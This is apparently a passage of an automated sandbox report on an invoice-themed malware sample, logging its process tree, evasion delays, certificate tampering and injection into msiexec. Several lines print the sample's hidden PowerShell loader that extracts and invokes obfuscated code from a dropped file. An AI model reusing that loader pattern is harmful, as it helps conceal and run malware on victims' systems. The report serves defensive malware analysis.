          Source: unknownProcess created: C:\Users\user\Desktop\REVISED INVOICE.exe "C:\Users\user\Desktop\REVISED INVOICE.exe"
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn2.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntdsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64win.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wow64cpu.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msacm32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rpcrtremote.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: credssp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: bcrypt.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
          Source: depoh.lnk.0.drLNK file: ..\..\..\seniors.tal
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: REVISED INVOICE.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: e:\Windows\System.Core.pdbpdbore.pdb source: powershell.exe, 00000003.00000002.481790461.0000000004E36000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: Yara matchFile source: 00000003.00000002.482186551.0000000009778000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Funktionserklringen=Get-Content -raw 'C:\Users\user\AppData\Local\fona\Kvit\Hyperclimax.Com';$Longers=$Funktionserklringen.SubString(56921,3);.$Longers($Funktionserklringen)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06460AC8 push ebx; retf 3_2_06460AC9
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_064636B5 pushfd ; iretd 3_2_064636B6
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_06462082 push esp; retf 3_2_06462084
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_064608BA push ebp; ret 3_2_064608E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_01D40AC8 push ebx; retf 5_2_01D40AC9
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_01D42082 push esp; retf 5_2_01D42084
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_01D436B5 pushfd ; iretd 5_2_01D436B6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_01D408BA push ebp; ret 5_2_01D408E3
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_214B21AC push ebx; iretd 5_2_214B21EA
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\fona\Kvit\REVISED INVOICE.exeJump to dropped file
          Source: C:\Windows\SysWOW64\msiexec.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5524Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4352Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3244Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720Thread sleep time: -11990383647911201s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3720Thread sleep time: -1800000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724Thread sleep count: 282 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 3724Thread sleep count: 9537 > 30Jump to behavior
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00406362 FindFirstFileW,FindClose,0_2_00406362
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405810
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: REVISED INVOICE.exe, REVISED INVOICE.exe.3.drBinary or memory string: hGfSR
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeAPI call chain: ExitProcess graph end nodegraph_0-3341
          Source: C:\Users\user\Desktop\REVISED INVOICE.exeAPI call chain: ExitProcess graph end nodegraph_0-3344
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
